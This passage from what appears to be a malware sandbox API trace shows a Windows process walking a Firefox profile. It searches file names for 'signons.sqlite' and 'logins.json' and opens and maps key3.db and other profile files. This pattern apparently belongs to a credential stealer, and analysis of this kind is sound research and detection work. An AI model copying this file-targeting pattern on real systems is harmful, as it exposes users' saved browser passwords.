[0589.700] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.700] CloseHandle (hObject=0x660) returned 1 [0589.700] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0589.700] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5a2988 [0589.700] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x5a2988, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0589.700] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.700] CloseHandle (hObject=0x660) returned 1 [0589.700] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.700] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0589.700] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0589.700] CloseHandle (hObject=0x660) returned 1 [0589.700] LocalFree (hMem=0x5a2988) returned 0x0 [0589.700] StrStrIW (lpFirst=".metadata", lpSrch="signons.sqlite") returned 0x0 [0589.700] StrStrIW (lpFirst=".metadata", lpSrch="logins.json") returned 0x0 [0589.700] LocalFree (hMem=0x5e1e70) returned 0x0 [0589.700] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 1 [0589.700] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0589.700] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0589.700] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.701] lstrlenW (lpString="\\") returned 1 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x5e1d10 [0589.701] lstrlenW (lpString="idb") returned 3 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x5e1e70 [0589.701] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.701] lstrlenW (lpString="\\*.*") returned 4 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x5a2988 [0589.701] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d894 | out: lpFindFileData=0x52d894) returned 0x5b9b50 [0589.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.701] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d894 | out: lpFindFileData=0x52d894) returned 1 [0589.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.701] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d894 | out: lpFindFileData=0x52d894) returned 1 [0589.701] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0589.701] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.701] lstrlenW (lpString="\\") returned 1 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5a2af8 [0589.701] lstrlenW (lpString="818200132aebmoouht") returned 18 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x5f02b0 [0589.701] LocalFree (hMem=0x5a2af8) returned 0x0 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0589.701] lstrlenW (lpString="\\*.*") returned 4 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x5a2af8 [0589.701] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d61c | out: lpFindFileData=0x52d61c) returned 0x5b9b10 [0589.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.701] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d61c | out: lpFindFileData=0x52d61c) returned 1 [0589.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.701] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d61c | out: lpFindFileData=0x52d61c) returned 0 [0589.701] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0589.701] LocalFree (hMem=0x5a2af8) returned 0x0 [0589.701] LocalFree (hMem=0x5f02b0) returned 0x0 [0589.701] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d894 | out: lpFindFileData=0x52d894) returned 1 [0589.701] lstrlenW (lpString="\\") returned 1 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5a2af8 [0589.701] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0589.701] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0589.701] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5f02b0 [0589.701] LocalFree (hMem=0x5a2af8) returned 0x0 [0589.702] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.702] CloseHandle (hObject=0x668) returned 1 [0589.702] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0589.702] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5a2af8 [0589.702] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x5a2af8, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0589.702] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.702] CloseHandle (hObject=0x668) returned 1 [0589.702] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.702] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0589.702] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.702] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.712] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.724] CloseHandle (hObject=0x66c) returned 1 [0589.724] CloseHandle (hObject=0x668) returned 1 [0589.724] LocalFree (hMem=0x5a2af8) returned 0x0 [0589.724] LocalFree (hMem=0x5f02b0) returned 0x0 [0589.724] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d894 | out: lpFindFileData=0x52d894) returned 0 [0589.724] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.724] LocalFree (hMem=0x5a2988) returned 0x0 [0589.724] LocalFree (hMem=0x5e1e70) returned 0x0 [0589.724] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0 [0589.724] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.724] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.724] LocalFree (hMem=0x578c48) returned 0x0 [0589.724] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0 [0589.724] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.724] LocalFree (hMem=0x56afc8) returned 0x0 [0589.725] LocalFree (hMem=0x578b10) returned 0x0 [0589.725] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.725] lstrlenW (lpString="\\") returned 1 [0589.725] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.725] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.725] lstrlenW (lpString="key3.db") returned 7 [0589.725] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.725] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x578b10 [0589.725] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.725] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.725] CloseHandle (hObject=0x5ac) returned 1 [0589.725] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0589.725] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x59a8a0 [0589.725] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x59a8a0, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0589.725] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.725] CloseHandle (hObject=0x5ac) returned 1 [0589.725] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.725] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0589.725] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.725] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.725] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.726] CloseHandle (hObject=0x4c8) returned 1 [0589.726] CloseHandle (hObject=0x5ac) returned 1 [0589.726] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.726] LocalFree (hMem=0x578b10) returned 0x0 [0589.726] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.726] lstrlenW (lpString="\\") returned 1 [0589.726] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.726] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.726] lstrlenW (lpString="localstore.rdf") returned 14 [0589.726] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.726] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.726] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.726] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.726] CloseHandle (hObject=0x5ac) returned 1 [0589.726] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.726] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.726] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0589.726] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.726] CloseHandle (hObject=0x5ac) returned 1 [0589.726] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.726] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0589.726] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.726] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.727] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.727] CloseHandle (hObject=0x4c8) returned 1 [0589.727] CloseHandle (hObject=0x5ac) returned 1 [0589.727] LocalFree (hMem=0x56c300) returned 0x0 [0589.727] LocalFree (hMem=0x56afc8) returned 0x0 [0589.727] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.727] lstrlenW (lpString="\\") returned 1 [0589.727] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.727] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.727] lstrlenW (lpString="marionette.log") returned 14 [0589.727] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.727] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.727] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.727] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.727] CloseHandle (hObject=0x5ac) returned 1 [0589.727] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.727] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.727] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0589.727] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.727] CloseHandle (hObject=0x5ac) returned 1 [0589.727] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.727] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0589.727] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.727] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.728] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.728] CloseHandle (hObject=0x4c8) returned 1 [0589.728] CloseHandle (hObject=0x5ac) returned 1 [0589.728] LocalFree (hMem=0x56c300) returned 0x0 [0589.728] LocalFree (hMem=0x56afc8) returned 0x0 [0589.728] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.728] lstrlenW (lpString="\\") returned 1 [0589.728] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.728] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.728] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0589.728] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.728] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.728] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.728] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.728] CloseHandle (hObject=0x5ac) returned 1 [0589.728] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.728] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.728] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0589.728] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.728] CloseHandle (hObject=0x5ac) returned 1 [0589.728] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.728] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0589.728] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.728] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.729] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.729] CloseHandle (hObject=0x4c8) returned 1 [0589.729] CloseHandle (hObject=0x5ac) returned 1 [0589.729] LocalFree (hMem=0x56c300) returned 0x0 [0589.729] LocalFree (hMem=0x56afc8) returned 0x0 [0589.729] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.729] lstrcmpiW 